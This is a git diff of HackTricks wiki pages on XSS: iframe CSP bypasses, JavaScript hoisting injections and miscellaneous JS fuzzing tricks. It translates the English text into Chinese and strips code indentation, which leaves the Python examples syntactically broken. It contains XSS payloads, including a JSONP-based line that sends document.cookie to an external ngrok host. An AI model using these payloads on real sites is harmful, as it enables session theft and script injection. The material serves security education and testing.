+### 带 CSP 的 Iframes <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
 
 > [!NOTE]
-> Please, note how in the following bypasses the response to the iframed page doesn't contain any CSP header that prevents JS execution.
-
-The `self` value of `script-src` won’t allow the execution of the JS code using the `data:` protocol or the `srcdoc` attribute.\
-However, even the `none` value of the CSP will allow the execution of the iframes that put a URL (complete or just the path) in the `src` attribute.\
-Therefore it’s possible to bypass the CSP of a page with:
+> 请注意，在以下绕过中，iframe 页面响应不包含任何阻止 JS 执行的 CSP 头。
 
+`script-src` 的 `self` 值将不允许使用 `data:` 协议或 `srcdoc` 属性执行 JS 代码。\
+然而，即使 CSP 的 `none` 值也将允许执行在 `src` 属性中放置 URL（完整或仅路径）的 iframes。\
+因此，可以通过以下方式绕过页面的 CSP：
 ```html
 <html>
-  <head>
-    <meta
-      http-equiv="Content-Security-Policy"
-      content="script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk='" />
-  </head>
-  <script>
-    var secret = "31337s3cr37t"
-  </script>
-  <iframe id="if1" src="child.html"></iframe>
-  <iframe id="if2" src="http://127.0.1.1:8000/child.html"></iframe>
-  <iframe
-    id="if3"
-    srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
-  <iframe
-    id="if4"
-    src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
+<head>
+<meta
+http-equiv="Content-Security-Policy"
+content="script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk='" />
+</head>
+<script>
+var secret = "31337s3cr37t"
+</script>
+<iframe id="if1" src="child.html"></iframe>
+<iframe id="if2" src="http://127.0.1.1:8000/child.html"></iframe>
+<iframe
+id="if3"
+srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
+<iframe
+id="if4"
+src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
 </html>
 ```
-
-Note how the **previous CSP only permits the execution of the inline script**.\
-However, **only `if1` and `if2` scripts are going to be executed but only `if1` will be able to access the parent secret**.
+注意到**之前的CSP只允许执行内联脚本**。\
+然而，**只有`if1`和`if2`脚本将被执行，但只有`if1`能够访问父级秘密**。
 
 ![](<../../images/image (372).png>)
 
-Therefore, it’s possible to **bypass a CSP if you can upload a JS file to the server and load it via iframe even with `script-src 'none'`**. This can **potentially be also done abusing a same-site JSONP endpoint**.
-
-You can test this with the following scenario were a cookie is stolen even with `script-src 'none'`. Just run the application and access it with your browser:
+因此，如果您可以将JS文件上传到服务器并通过iframe加载，即使`script-src 'none'`，也可以**绕过CSP**。这也**可能通过滥用同站JSONP端点来实现**。
 
+您可以通过以下场景进行测试，即使在`script-src 'none'`的情况下也会窃取cookie。只需运行应用程序并使用浏览器访问它：
 ```python
 import flask
 from flask import Flask
@@ -96,57 +91,52 @@ app = Flask(__name__)
 
 @app.route("/")
 def index():
-    resp = flask.Response('<html><iframe id="if1" src="cookie_s.html"></iframe></html>')
-    resp.headers['Content-Security-Policy'] = "script-src 'self'"
-    resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
-    return resp
+resp = flask.Response('<html><iframe id="if1" src="cookie_s.html"></iframe></html>')
+resp.headers['Content-Security-Policy'] = "script-src 'self'"
+resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
+return resp
 
 @app.route("/cookie_s.html")
 def cookie_s():
-    return "<script>alert(document.cookie)</script>"
+return "<script>alert(document.cookie)</script>"
 
 if __name__ == "__main__":
-    app.run()
+app.run()
 ```
-
-### Other Payloads found on the wild <a href="#other_payloads_found_on_the_wild_64" id="other_payloads_found_on_the_wild_64"></a>
-
+### 在野外发现的其他有效载荷 <a href="#other_payloads_found_on_the_wild_64" id="other_payloads_found_on_the_wild_64"></a>
 ```html
 <!-- This one requires the data: scheme to be allowed -->
 <iframe
-  srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
+srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
 <!-- This one injects JS in a jsonp endppoint -->
 <iframe srcdoc='
 <script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
 <!-- sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)-->
 <iframe
-  src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
+src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
 ```
-
 ### Iframe sandbox
 
-The content within an iframe can be subjected to additional restrictions through the use of the `sandbox` attribute. By default, this attribute is not applied, meaning no restrictions are in place.
+iframe 内的内容可以通过使用 `sandbox` 属性受到额外限制。默认情况下，此属性不适用，这意味着没有限制。
 
-When utilized, the `sandbox` attribute imposes several limitations:
+当使用时，`sandbox` 属性施加了几个限制：
 
-- The content is treated as if it originates from a unique source.
-- Any attempt to submit forms is blocked.
-- Execution of scripts is prohibited.
-- Access to certain APIs is disabled.
-- It prevents links from interacting with other browsing contexts.
-- Use of plugins via `<embed>`, `<object>`, `<applet>`, or similar tags is disallowed.
-- Navigation of the content's top-level browsing context by the content itself is prevented.
-- Features that are triggered automatically, like video playback or auto-focusing of form controls, are blocked.
-
-The attribute's value can be left empty (`sandbox=""`) to apply all the aforementioned restrictions. Alternatively, it can be set to a space-separated list of specific values that exempt the iframe from certain restrictions.
+- 内容被视为来自一个独特的源。
+- 任何提交表单的尝试都被阻止。
+- 禁止执行脚本。
+- 禁用对某些 API 的访问。
+- 防止链接与其他浏览上下文交互。
+- 禁止通过 `<embed>`、`<object>`、`<applet>` 或类似标签使用插件。
+- 防止内容自身导航到其顶级浏览上下文。
+- 自动触发的功能，如视频播放或表单控件的自动聚焦，被阻止。
 
+属性的值可以留空（`sandbox=""`）以应用上述所有限制。或者，可以设置为一个以空格分隔的特定值列表，以使 iframe 免于某些限制。
 ```html
 <iframe src="demo_iframe_sandbox.htm" sandbox></iframe>
 ```
+## SOP中的Iframes
 
-## Iframes in SOP
-
-Check the following pages:
+查看以下页面：
 
 {{#ref}}
 ../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
@@ -165,4 +155,3 @@ Check the following pages:
 {{#endref}}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md b/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
index 237c20562..6ba9b0489 100644
--- a/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
+++ b/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
@@ -1,12 +1,11 @@
-# Integer Overflow
+# 整数溢出
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Check:
+检查：
 
 {{#ref}}
 ../../binary-exploitation/integer-overflow.md
 {{#endref}}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
index 39591b5b5..e2fad75c7 100644
--- a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
+++ b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
@@ -2,32 +2,31 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-In the JavaScript language, a mechanism known as **Hoisting** is described where declarations of variables, functions, classes, or imports are conceptually raised to the top of their scope before the code is executed. This process is automatically performed by the JavaScript engine, which goes through the script in multiple passes.
+在JavaScript语言中，有一种机制称为**提升**，它描述了变量、函数、类或导入的声明在代码执行之前概念上被提升到其作用域的顶部。这个过程是由JavaScript引擎自动执行的，脚本会经过多次处理。
 
-During the first pass, the engine parses the code to check for syntax errors and transforms it into an abstract syntax tree. This phase includes hoisting, a process where certain declarations are moved to the top of the execution context. If the parsing phase is successful, indicating no syntax errors, the script execution proceeds.
+在第一次处理期间，引擎解析代码以检查语法错误，并将其转换为抽象语法树。这个阶段包括提升，这是一个将某些声明移动到执行上下文顶部的过程。如果解析阶段成功，表明没有语法错误，则脚本执行继续进行。
 
-It is crucial to understand that:
+理解以下几点至关重要：
 
-1. The script must be free of syntax errors for execution to occur. Syntax rules must be strictly adhered to.
-2. The placement of code within the script affects execution due to hoisting, although the executed code might differ from its textual representation.
+1. 脚本必须没有语法错误才能执行。必须严格遵守语法规则。
+2. 代码在脚本中的位置会因提升而影响执行，尽管执行的代码可能与其文本表示不同。
 
-#### Types of Hoisting
+#### 提升的类型
 
-Based on the information from MDN, there are four distinct types of hoisting in JavaScript:
+根据MDN的信息，JavaScript中有四种不同类型的提升：
 
-1. **Value Hoisting**: Enables the use of a variable's value within its scope before its declaration line.
-2. **Declaration Hoisting**: Allows referencing a variable within its scope before its declaration without causing a `ReferenceError`, but the variable's value will be `undefined`.
-3. This type alters the behavior within its scope due to the variable's declaration before its actual declaration line.
-4. The declaration's side effects occur before the rest of the code containing it is evaluated.
+1. **值提升**：允许在声明行之前在其作用域内使用变量的值。
+2. **声明提升**：允许在声明之前引用变量而不会引发`ReferenceError`，但变量的值将是`undefined`。
+3. 这种类型由于变量在实际声明行之前的声明而改变其作用域内的行为。
+4. 声明的副作用在包含它的其余代码被评估之前发生。
 
-In detail, function declarations exhibit type 1 hoisting behavior. The `var` keyword demonstrates type 2 behavior. Lexical declarations, which include `let`, `const`, and `class`, show type 3 behavior. Lastly, `import` statements are unique in that they are hoisted with both type 1 and type 4 behaviors.
+详细来说，函数声明表现出类型1的提升行为。`var`关键字展示了类型2的行为。词法声明，包括`let`、`const`和`class`，显示了类型3的行为。最后，`import`语句是独特的，因为它们同时具有类型1和类型4的提升行为。
 
-## Scenarios
-
-Therefore if you have scenarios where you can **Inject JS code after an undeclared object** is used, you could **fix the syntax** by declaring it (so your code gets executed instead of throwing an error):
+## 场景
 
+因此，如果您有场景可以**在未声明对象后注入JS代码**，您可以通过声明它来**修复语法**（这样您的代码会被执行而不是抛出错误）：
 ```javascript
 // The function vulnerableFunction is not defined
 vulnerableFunction('test', '<INJECTION>');
@@ -43,7 +42,7 @@ test'); function vulnerableFunction(a,b){ return 1 };alert(1)
 // If a variable is not defined, you could define it in the injection
 // In the following example var a is not defined
 function myFunction(a,b){
-    return 1
+return 1
 };
 myFunction(a, '<INJECTION>')
 
@@ -57,7 +56,7 @@ var variable = new unexploitableClass();
 <INJECTION>
 // But you can actually declare it as a function, being able to fix the syntax with something like:
 function unexploitableClass() {
-    return 1;
+return 1;
 }
 alert(1);
 ```
@@ -69,9 +68,7 @@ alert(1);
 test.cookie("leo", "INJECTION")
 test[("cookie", "injection")]
 ```
-
-## More Scenarios
-
+## 更多场景
 ```javascript
 // Undeclared var accessing to an undeclared method
 x.y(1,INJECTION)
@@ -93,11 +90,11 @@ x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
 // The imported module:
 // module.js
 var x = {
-  y: {
-    z: function(param) {
-      eval(param);
-    }
-  }
+y: {
+z: function(param) {
+eval(param);
+}
+}
 };
 
 export { x };
@@ -110,33 +107,31 @@ export { x };
 // And the same injection was replicated in the body URL to execute an alert
 
 try {
-  if (config) {
-    return
-  }
-  // TODO handle missing config for: https://try-to-catch.glitch.me/"+`
-  let config
-  ;`-alert(1)` //`+"
+if (config) {
+return
+}
+// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
+let config
+;`-alert(1)` //`+"
 } catch {
-  fetch("/error", {
-    method: "POST",
-    body: {
-      url:
-        "https://try-to-catch.glitch.me/" +
-        `
+fetch("/error", {
+method: "POST",
+body: {
+url:
+"https://try-to-catch.glitch.me/" +
+`
 let config;` -
-        alert(1) -
-        `//` +
-        "",
-    },
-  })
+alert(1) -
+`//` +
+"",
+},
+})
 }
 ```
-
-## References
+## 参考文献
 
 - [https://jlajara.gitlab.io/Javascript_Hoisting_in_XSS_Scenarios](https://jlajara.gitlab.io/Javascript_Hoisting_in_XSS_Scenarios)
 - [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
 - [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
index e1cceafaa..6400b20b4 100644
--- a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
+++ b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
@@ -1,11 +1,10 @@
-# Misc JS Tricks & Relevant Info
+# 杂项 JS 技巧与相关信息
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Javascript Fuzzing
-
-### Valid JS Comment Chars
+## Javascript 模糊测试
 
+### 有效的 JS 注释字符
 ```javascript
 //This is a 1 line comment
 /* This is a multiline comment*/
@@ -14,51 +13,49 @@
 
 
 for (let j = 0; j < 128; j++) {
-  for (let k = 0; k < 128; k++) {
-    for (let l = 0; l < 128; l++) {
-      if (j == 34 || k ==34 || l ==34)
-        continue;
-      if (j == 0x0a || k ==0x0a || l ==0x0a)
-        continue;
-      if (j == 0x0d || k ==0x0d || l ==0x0d)
-        continue;
-      if (j == 0x3c || k ==0x3c || l ==0x3c)
-        continue;
-      if (
-         (j == 47 && k == 47)
-         ||(k == 47 && l == 47)
-        )
-        continue;
-  try {
-      var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"';
-      eval(cmd);
-  } catch(e) {
-      var err = e.toString().split('\n')[0].split(':')[0];
-      if (err === 'SyntaxError' || err === "ReferenceError")
-        continue
-      err = e.toString().split('\n')[0]
-  }
-     console.log(err,cmd);
-  }
-  }
+for (let k = 0; k < 128; k++) {
+for (let l = 0; l < 128; l++) {
+if (j == 34 || k ==34 || l ==34)
+continue;
+if (j == 0x0a || k ==0x0a || l ==0x0a)
+continue;
+if (j == 0x0d || k ==0x0d || l ==0x0d)
+continue;
+if (j == 0x3c || k ==0x3c || l ==0x3c)
+continue;
+if (
+(j == 47 && k == 47)
+||(k == 47 && l == 47)
+)
+continue;
+try {
+var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"';
+eval(cmd);
+} catch(e) {
+var err = e.toString().split('\n')[0].split(':')[0];
+if (err === 'SyntaxError' || err === "ReferenceError")
+continue
+err = e.toString().split('\n')[0]
+}
+console.log(err,cmd);
+}
+}
 }
 //From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
 
 // From: Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 43). Kindle Edition.
 log=[];
 for(let i=0;i<=0xff;i++){
-  for(let j=0;j<=0xfff;j++){
-    try {
-      eval(`${String.fromCodePoint(i,j)}%$£234$`)
-      log.push([i,j])
-    }catch(e){}
-  }
+for(let j=0;j<=0xfff;j++){
+try {
+eval(`${String.fromCodePoint(i,j)}%$£234$`)
+log.push([i,j])
+}catch(e){}
+}
 }
 console.log(log)//[35,33],[47,47]
 ```
-
-### Valid JS New Lines Chars
-
+### 有效的 JS 新行字符
 ```javascript
 //Javascript interpret as new line these chars:
 String.fromCharCode(10) //0x0a
@@ -67,21 +64,19 @@ String.fromCharCode(8232) //0xe2 0x80 0xa8
 String.fromCharCode(8233) //0xe2 0x80 0xa8
 
 for (let j = 0; j < 65536; j++) {
-  try {
-    var cmd = '"aaaaa";' + String.fromCharCode(j) + '-->a.orange.ctf"'
-    eval(cmd)
-  } catch (e) {
-    var err = e.toString().split("\n")[0].split(":")[0]
-    if (err === "SyntaxError" || err === "ReferenceError") continue
-    err = e.toString().split("\n")[0]
-  }
-  console.log(`[${err}]`, j, cmd)
+try {
+var cmd = '"aaaaa";' + String.fromCharCode(j) + '-->a.orange.ctf"'
+eval(cmd)
+} catch (e) {
+var err = e.toString().split("\n")[0].split(":")[0]
+if (err === "SyntaxError" || err === "ReferenceError") continue
+err = e.toString().split("\n")[0]
+}
+console.log(`[${err}]`, j, cmd)
 }
 //From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
 ```
-
-### Valid JS Spaces in function call
-
+### 有效的 JS 空格在函数调用中
 ```javascript
 // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 40-41). Kindle Edition.
 
@@ -90,63 +85,54 @@ function x(){}
 
 log=[];
 for(let i=0;i<=0x10ffff;i++){
-    try {
-        eval(`x${String.fromCodePoint(i)}()`)
-        log.push(i)
-    }catch(e){}
+try {
+eval(`x${String.fromCodePoint(i)}()`)
+log.push(i)
+}catch(e){}
 }
 
 console.log(log)v//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,813 232,8233,8239,8287,12288,65279
 ```
-
-### **Valid chars to Generate Strings**
-
+### **生成字符串的有效字符**
 ```javascript
 // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 41-42). Kindle Edition.
 
 // Check which pairs of chars can make something be a valid string
 log = []
 for (let i = 0; i <= 0x10ffff; i++) {
-  try {
-    eval(`${String.fromCodePoint(i)}%$£234${String.fromCodePoint(i)}`)
-    log.push(i)
-  } catch (e) {}
+try {
+eval(`${String.fromCodePoint(i)}%$£234${String.fromCodePoint(i)}`)
+log.push(i)
+} catch (e) {}
 }
 console.log(log) //34,39,47,96
 //single quote, quotes, backticks & // (regex)
 ```
-
 ### **Surrogate Pairs BF**
 
-This technique won't be very useful for XSS but it could be useful to bypass WAF protections. This python code receive as input 2bytes and it search a surrogate pairs that have the first byte as the the last bytes of the High surrogate pair and the the last byte as the last byte of the low surrogate pair.
-
+这个技术对于 XSS 并不是很有用，但它可能有助于绕过 WAF 保护。这个 Python 代码接收 2 字节作为输入，并搜索一个代理对，其中第一个字节是高代理对的最后一个字节，最后一个字节是低代理对的最后一个字节。
 ```python
 def unicode(findHex):
-    for i in range(0,0xFFFFF):
-        H = hex(int(((i - 0x10000) / 0x400) + 0xD800))
-        h = chr(int(H[-2:],16))
-        L = hex(int(((i - 0x10000) % 0x400 + 0xDC00)))
-        l = chr(int(L[-2:],16))
-        if(h == findHex[0]) and (l == findHex[1]):
-            print(H.replace("0x","\\u")+L.replace("0x","\\u"))
+for i in range(0,0xFFFFF):
+H = hex(int(((i - 0x10000) / 0x400) + 0xD800))
+h = chr(int(H[-2:],16))
+L = hex(int(((i - 0x10000) % 0x400 + 0xDC00)))
+l = chr(int(L[-2:],16))
+if(h == findHex[0]) and (l == findHex[1]):
+print(H.replace("0x","\\u")+L.replace("0x","\\u"))
 ```
+更多信息：
 
-More info:
-
-- [https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md](https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md)
-- [https://mathiasbynens.be/notes/javascript-unicode](https://mathiasbynens.be/notes/javascript-unicode) [https://mathiasbynens.be/notes/javascript-encoding](https://mathiasbynens.be/notes/javascript-encoding)
-
-### `javascript{}:` Protocol Fuzzing
-
+### `javascript{}:` 协议模糊测试
 ```javascript
 // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 34). Kindle Edition.
 log=[];
 let anchor = document.createElement('a');
 for(let i=0;i<=0x10ffff;i++){
-    anchor.href = `javascript${String.fromCodePoint(i)}:`;
-    if(anchor.protocol === 'javascript:') {
-        log.push(i);
-    }
+anchor.href = `javascript${String.fromCodePoint(i)}:`;
+if(anchor.protocol === 'javascript:') {
+log.push(i);
+}
 }
 console.log(log)//9,10,13,58
 // Note that you could BF also other possitions of the use of multiple chars
@@ -160,9 +146,7 @@ document.body.append(anchor)
 // Another way to test
 <a href="&#12;javascript:alert(1337)">Test</a>
 ```
-
-### URL Fuzzing
-
+### URL 模糊测试
 ```javascript
 // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 36-37). Kindle Edition.
 
@@ -170,10 +154,10 @@ document.body.append(anchor)
 a = document.createElement("a")
 log = []
 for (let i = 0; i <= 0x10ffff; i++) {
-  a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz`
-  if (a.hostname === "hacktricks.xyz") {
-    log.push(i)
-  }
+a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz`
+if (a.hostname === "hacktricks.xyz") {
+log.push(i)
+}
 }
 console.log(log) //0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
 
@@ -181,16 +165,14 @@ console.log(log) //0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 a = document.createElement("a")
 log = []
 for (let i = 0; i <= 0x10ffff; i++) {
-  a.href = `/${String.fromCodePoint(i)}/hacktricks.xyz`
-  if (a.hostname === "hacktricks.xyz") {
-    log.push(i)
-  }
+a.href = `/${String.fromCodePoint(i)}/hacktricks.xyz`
+if (a.hostname === "hacktricks.xyz") {
+log.push(i)
+}
 }
 console.log(log) //9,10,13,47,92
 ```
-
-### HTML Fuzzing
-
+### HTML 模糊测试
 ```javascript
 // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 38). Kindle Edition.
 
@@ -199,73 +181,69 @@ console.log(log) //9,10,13,47,92
 let log = []
 let div = document.createElement("div")
 for (let i = 0; i <= 0x10ffff; i++) {
-  div.innerHTML = `<!----${String.fromCodePoint(i)}><span></span>-->`
-  if (div.querySelector("span")) {
-    log.push(i)
-  }
+div.innerHTML = `<!----${String.fromCodePoint(i)}><span></span>-->`
+if (div.querySelector("span")) {
+log.push(i)
+}
 }
 console.log(log) //33,45,62
 ```
+## **分析属性**
 
-## **Analizing attributtes**
+工具 **Hackability inspector** 来自 Portswigger，帮助 **分析** javascript 对象的 **属性**。查看: [https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E](https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E)
 
-The tool **Hackability inspector** from Portswigger helps to **analyze** the **attributtes** of a javascript object. Check: [https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E](https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E)
+## **.map js 文件**
 
-## **.map js files**
+- 下载 .map js 文件的技巧: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7)
+- 你可以使用这个工具来分析这些文件 [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji)
 
-- Trick to download .map js files: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7)
-- You can use this tool to analyze these files [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji)
+## "--" 赋值
 
-## "--" Assignment
-
-The decrement operator `--` is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to `NaN`. This can be used to **remove the content of variables from the environment**.
+递减运算符 `--` 也是一种赋值。这个运算符取一个值，然后将其减去一。如果该值不是数字，它将被设置为 `NaN`。这可以用来 **从环境中移除变量的内容**。
 
 ![](<../../images/image (993).png>)
 
 ![](<../../images/image (329).png>)
 
-## Functions Tricks
+## 函数技巧
 
-### .call and .apply
-
-The **`.call`** method of a function is used to **run the function**.\
-The **first argument** it expects by default is the **value of `this`** and if **nothing** is provided, **`window`** will be that value (unless **`strict mode`** is used).
+### .call 和 .apply
 
+函数的 **`.call`** 方法用于 **运行函数**。\
+它默认期望的 **第一个参数** 是 **`this` 的值**，如果 **没有** 提供，**`window`** 将是该值（除非使用 **`严格模式`**）。
 ```javascript
 function test_call() {
-  console.log(this.value) //baz
+console.log(this.value) //baz
 }
 new_this = { value: "hey!" }
 test_call.call(new_this)
 
 // To pass more arguments, just pass then inside .call()
 function test_call() {
-  console.log(arguments[0]) //"arg1"
-  console.log(arguments[1]) //"arg2"
-  console.log(this) //[object Window]
+console.log(arguments[0]) //"arg1"
+console.log(arguments[1]) //"arg2"
+console.log(this) //[object Window]
 }
 test_call.call(null, "arg1", "arg2")
 
 // If you use the "use strict" directive "this" will be null instead of window:
 function test_call() {
-  "use strict"
-  console.log(this) //null
+"use strict"
+console.log(this) //null
 }
 test_call.call(null)
 
 //The apply function is pretty much exactly the same as the call function with one important difference, you can supply an array of arguments in the second argument:
 function test_apply() {
-  console.log(arguments[0]) //"arg1"
-  console.log(arguments[1]) //"arg2"
-  console.log(this) //[object Window]
+console.log(arguments[0]) //"arg1"
+console.log(arguments[1]) //"arg2"
+console.log(this) //[object Window]
 }
 test_apply.apply(null, ["arg1", "arg2"])
 ```
+### 箭头函数
 
-### Arrow functions
-
-Arrow functions allow you to generate functions in a single line more easily (if you understand them)
-
+箭头函数允许您更轻松地在一行中生成函数（如果您理解它们）
 ```javascript
 // Traditional
 function (a){ return a + 1; }
@@ -288,27 +266,23 @@ let a = 4;
 let b = 2;
 () => a + b + 1;
 ```
-
-So, most of the previous functions are actually useless because we aren't saving them anywhere to save and call them. Example creating the `plusone` function:
-
+所以，之前的大多数函数实际上是无用的，因为我们没有将它们保存到任何地方以便保存和调用它们。 例如创建 `plusone` 函数：
 ```javascript
 // Traductional
 function plusone(a) {
-  return a + 1
+return a + 1
 }
 
 //Arrow
 plusone = (a) => a + 100
 ```
+### Bind 函数
 
-### Bind function
-
-The bind function allow to create a **copy** of a **function modifying** the **`this`** object and the **parameters** given.
-
+bind 函数允许创建一个 **函数的副本**，修改 **`this`** 对象和给定的 **参数**。
 ```javascript
 //This will use the this object and print "Hello World"
 var fn = function (param1, param2) {
-  console.info(this, param1, param2)
+console.info(this, param1, param2)
 }
 fn("Hello", "World")
 
@@ -328,60 +302,52 @@ bindFn_change("Hello", "World")
 var bindFn_this = fn.bind(this, "fixingparam1")
 bindFn_change("Hello", "World")
 ```
-
 > [!NOTE]
-> Note that using **`bind`** you can manipulate the **`this`** object that is going to be used when calling the function.
+> 请注意，使用 **`bind`** 可以操控在调用函数时将要使用的 **`this`** 对象。
 
-### Function code leak
-
-If you can **access the object** of a function you can **get the code** of that function
+### 函数代码泄露
 
+如果您可以 **访问函数的对象**，您可以 **获取该函数的代码**。
 ```javascript
 function afunc() {
-  return 1 + 1
+return 1 + 1
 }
 console.log(afunc.toString()) //This will print the code of the function
 console.log(String(afunc)) //This will print the code of the function
 console.log(this.afunc.toString()) //This will print the code of the function
 console.log(global.afunc.toString()) //This will print the code of the function
 ```
-
-In cases where the **function doesn't have any name**, you can still print the **function code** from within:
-
+在**函数没有任何名称**的情况下，您仍然可以从内部打印**函数代码**：
 ```javascript
 ;(function () {
-  return arguments.callee.toString()
+return arguments.callee.toString()
 })()(function () {
-  return arguments[0]
+return arguments[0]
 })("arg0")
 ```
-
-Some **random** ways to **extract the code** of a function (even comments) from another function:
-
+一些**随机**方法来**提取函数**的代码（甚至注释）从另一个函数：
 ```javascript
 ;(function () {
-  return (retFunc) => String(arguments[0])
+return (retFunc) => String(arguments[0])
 })((a) => {
-  /* Hidden commment */
+/* Hidden commment */
 })()(function () {
-  return (retFunc) => Array(arguments[0].toString())
+return (retFunc) => Array(arguments[0].toString())
 })((a) => {
-  /* Hidden commment */
+/* Hidden commment */
 })()(function () {
-  return String(this)
+return String(this)
 }).bind(() => {
-  /* Hidden commment */
+/* Hidden commment */
 })()((u) => String(u))((_) => {
-  /* Hidden commment */
+/* Hidden commment */
 })((u) => (_) => String(u))((_) => {
-  /* Hidden commment */
+/* Hidden commment */
 })()
 ```
+## 沙箱逃逸 - 恢复窗口对象
 
-## Sandbox Escape - Recovering window object
-
-The Window object allows to reach globally defined functions like alert or eval.
-
+Window 对象允许访问全局定义的函数，如 alert 或 eval。
 ```javascript
 // Some ways to access window
 window.eval("alert(1)")
@@ -413,28 +379,26 @@ Error.prepareStackTrace=function(error, callSites){
 // From an HTML event
 // Events from HTML are executed in this context
 with(document) {
-    with(element) {
-        //executed event
-    }
+with(element) {
+//executed event
+}
 }
 // Because of that with(document) it's possible to access properties of document like:
 <img src onerror=defaultView.alert(1337)>
 <img src onerror=s=createElement('script');s.append('alert(1337)');appendChild(s)>
 ```
-
-## Breakpoint on access to value
-
+## 访问值时的断点
 ```javascript
 // Stop when a property in sessionStorage or localStorage is set/get
 // via getItem or setItem functions
 sessionStorage.getItem = localStorage.getItem = function (prop) {
-  debugger
-  return sessionStorage[prop]
+debugger
+return sessionStorage[prop]
 }
 
 localStorage.setItem = function (prop, val) {
-  debugger
-  localStorage[prop] = val
+debugger
+localStorage[prop] = val
 }
 ```
 
@@ -446,66 +410,62 @@ localStorage.setItem = function (prop, val) {
 // or to find where prototype pollutions are occurring
 
 function debugAccess(obj, prop, debugGet = true) {
-  var origValue = obj[prop]
+var origValue = obj[prop]
 
-  Object.defineProperty(obj, prop, {
-    get: function () {
-      if (debugGet) debugger
-      return origValue
-    },
-    set: function (val) {
-      debugger
-      origValue = val
-    },
-  })
+Object.defineProperty(obj, prop, {
+get: function () {
+if (debugGet) debugger
+return origValue
+},
+set: function (val) {
+debugger
+origValue = val
+},
+})
 }
 
 debugAccess(Object.prototype, "ppmap")
 ```
-
-## Automatic Browser Access to test payloads
-
